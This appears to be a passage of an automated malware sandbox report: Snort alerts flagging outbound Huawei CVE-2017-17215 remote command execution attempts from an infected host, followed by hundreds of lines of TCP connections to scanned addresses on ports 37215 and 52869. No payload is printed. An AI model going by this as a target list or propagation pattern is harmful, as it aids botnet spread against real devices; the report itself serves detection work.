                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45072 -> 157.230.177.125:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45072 -> 157.230.177.125:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40002 -> 157.59.116.210:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40002 -> 157.59.116.210:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36626 -> 217.159.91.139:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36626 -> 217.159.91.139:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35110 -> 157.73.230.79:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35110 -> 157.73.230.79:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38216 -> 197.235.150.198:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38216 -> 197.235.150.198:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56956 -> 89.73.227.199:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56956 -> 89.73.227.199:37215
                      Source: global trafficTCP traffic: 122.222.181.132 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 183.62.49.146 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 48.69.126.229 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 25.13.30.197 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 47.10.251.72 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.214.240.131 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 196.26.250.145 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 70.225.119.3 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 60.176.144.80 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 139.51.48.182 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 2.190.215.74 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 164.189.55.135 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 84.224.134.220 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 169.193.81.146 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 223.193.169.99 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 12.55.180.198 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 144.0.5.154 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 63.150.57.125 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 147.9.149.129 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 207.30.132.8 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 104.178.230.186 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 141.31.223.242 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.132.131.69 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 92.211.102.55 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 69.213.159.108 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 136.74.174.143 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 155.42.58.223 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 23.225.3.54 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.165.225.78 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.55.83.122 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.107.86.189 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 209.154.77.145 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 190.124.94.237 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.119.139.136 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.5.176.176 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 63.79.183.156 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 69.248.9.25 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.146.1.159 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.172.19.9 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 60.208.170.61 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 120.98.109.98 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.215.81.142 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 83.250.254.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 82.50.208.202 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 220.70.84.75 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 151.194.118.37 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 137.147.87.172 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 77.118.5.191 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.52.92.102 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 113.34.69.120 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 58.116.31.11 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.189.184.171 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 151.51.122.130 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 201.140.4.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.30.15.103 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.178.33.225 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 17.180.55.102 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 47.7.162.229 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 133.11.175.28 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 221.200.167.164 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 39.232.72.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.35.52.189 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 34.47.174.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 180.72.76.133 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 53.172.133.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 177.27.5.34 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 46.176.142.26 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 120.229.223.182 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 83.23.71.253 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 27.41.96.136 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 159.20.45.153 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.127.202.249 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 139.37.94.236 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 143.179.199.146 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 211.253.28.179 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 124.254.84.115 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 123.31.253.14 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.249.133.131 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 147.194.102.88 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 125.230.182.28 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 166.7.60.196 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 98.100.176.215 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 36.193.87.124 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 54.110.88.191 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 19.228.54.138 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 158.98.187.222 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 104.152.150.214 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.215.149.239 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 86.219.42.227 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 201.232.146.36 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 199.61.238.254 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 104.216.61.7 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 114.180.89.73 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.139.140.92 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 77.5.21.229 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 58.74.148.95 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 77.126.156.115 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.90.43.161 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.109.36.223 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.214.148.214 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 179.212.46.232 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 193.14.204.18 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.5.66.76 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 219.171.37.52 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 24.16.249.119 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 147.145.136.53 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 178.236.97.44 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 107.179.140.53 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.146.199.163 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 168.219.235.176 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.181.26.239 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 128.99.12.70 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 145.203.105.197 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 64.43.73.86 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 146.52.202.172 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.196.42.166 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 167.190.71.17 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 148.111.135.210 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.139.160.123 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 69.71.161.160 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 57.53.163.73 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 111.214.24.218 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 211.14.73.80 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 54.250.134.170 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 209.155.228.1 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 114.190.123.93 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 1.79.229.162 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 25.0.169.170 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.124.91.115 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 115.161.142.144 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.166.141.245 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 72.56.162.11 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 23.94.137.105 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 115.67.107.201 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.114.72.114 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 51.239.69.95 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 43.91.38.163 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.215.252.1 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 161.20.12.87 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 87.151.140.12 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 120.187.5.172 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 189.165.74.130 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.185.246.190 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 164.251.43.137 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 129.167.170.254 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 220.112.54.246 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.252.60.60 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 104.151.210.242 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.76.61.178 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.198.237.151 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.63.218.191 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 113.150.8.20 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 37.189.124.248 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.21.67.49 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 4.72.134.93 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 208.98.113.85 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.63.217.133 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 105.234.100.63 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 19.135.230.178 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 210.202.78.111 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 147.61.50.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 99.2.133.89 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 148.117.206.184 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 132.33.116.164 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.52.249.224 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 106.248.98.2 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.92.57.159 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 136.185.52.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 112.103.96.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.160.175.211 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 173.38.169.237 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 103.39.249.170 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.84.186.76 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.89.108.63 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 8.8.5.44 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 143.193.242.67 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.101.123.198 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.212.61.129 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 27.153.103.145 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 212.114.230.189 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 147.160.118.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 136.33.82.2 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 46.47.224.132 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 195.184.165.232 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 45.183.97.202 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 155.61.198.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 145.135.47.206 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 115.139.249.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 58.187.153.16 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 193.7.32.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.64.80.133 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.51.147.159 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 1.105.65.16 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 168.165.233.141 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.47.249.178 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 52.254.110.44 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 67.128.244.178 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.213.7.238 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.93.62.253 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 132.198.221.150 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 57.238.29.59 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 223.83.213.222 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.8.209.227 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.110.226.143 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.156.76.34 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 25.158.237.150 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 108.11.135.7 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.65.251.158 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 211.85.128.187 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 130.136.141.197 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 160.189.204.148 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 150.181.42.248 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.249.129.131 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 218.167.11.188 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 77.77.58.220 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 137.195.128.162 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 164.236.243.93 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 1.64.56.196 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.4.26.126 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 25.68.235.59 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 86.74.227.91 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.240.149.129 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.1.175.237 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 149.227.100.108 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.143.169.209 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 170.225.184.185 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 162.220.3.30 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 134.167.171.74 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 221.58.140.137 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 100.7.167.160 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 58.30.6.229 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 126.16.187.60 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 115.35.215.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 78.242.93.228 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 48.250.49.63 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 125.1.121.176 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 107.139.219.68 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 4.76.224.238 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 57.179.102.199 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 178.60.137.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 186.40.176.32 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.207.137.198 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 132.70.95.60 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 85.208.75.177 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 190.34.49.149 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.71.207.159 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 206.248.87.37 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 80.2.143.109 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 213.171.145.125 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 123.49.75.211 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 158.128.170.22 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 20.137.120.97 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 72.155.161.202 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 151.127.224.207 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 54.220.190.251 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 84.150.128.0 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.242.31.133 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 36.68.239.127 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 209.203.216.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 43.227.14.32 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 14.226.136.243 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 201.113.123.251 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 85.29.15.167 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 180.150.47.36 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.84.177.221 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.99.82.194 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.143.175.164 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 23.22.173.183 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 120.131.114.209 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 174.33.178.96 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 135.23.236.194 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 78.39.181.117 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 103.18.195.93 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 72.249.234.206 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 113.132.58.23 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.233.134.27 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 14.15.239.135 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.60.217.83 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 133.66.91.121 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 216.207.228.137 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 199.148.201.175 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.196.235.235 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.6.221.99 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 203.251.130.24 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.222.17.8 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 175.24.153.194 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.110.242.82 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 154.55.15.143 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 115.225.187.157 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 19.254.84.163 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 40.237.199.171 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 174.173.119.28 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 49.93.141.76 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 129.27.232.7 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 71.113.201.241 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 216.170.33.89 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 167.134.108.32 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.189.93.149 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 170.172.36.22 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 168.54.72.251 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 111.113.55.54 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 162.117.132.232 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 162.162.162.31 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 71.254.240.118 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 13.112.9.246 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 128.144.39.227 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 27.130.132.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 44.70.248.184 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 63.80.178.96 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 151.5.114.8 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.232.85.100 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 75.16.13.92 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 209.101.108.92 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 159.70.111.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 212.172.247.72 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 76.221.199.62 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.49.55.57 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 109.80.210.12 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 184.77.18.239 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 87.1.160.57 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 27.254.228.216 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 13.234.97.254 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 70.217.246.9 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 45.158.122.120 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.187.52.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 1.108.244.147 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 162.63.105.168 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 70.59.242.166 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 113.109.249.191 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 62.90.39.173 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.205.43.21 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 60.99.150.220 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 27.25.11.117 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 91.233.41.28 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 93.10.103.253 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 200.123.136.191 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.75.189.55 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 57.224.40.86 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.147.238.186 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 25.174.179.115 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.115.56.95 ports 1,2,3,5,7,37215
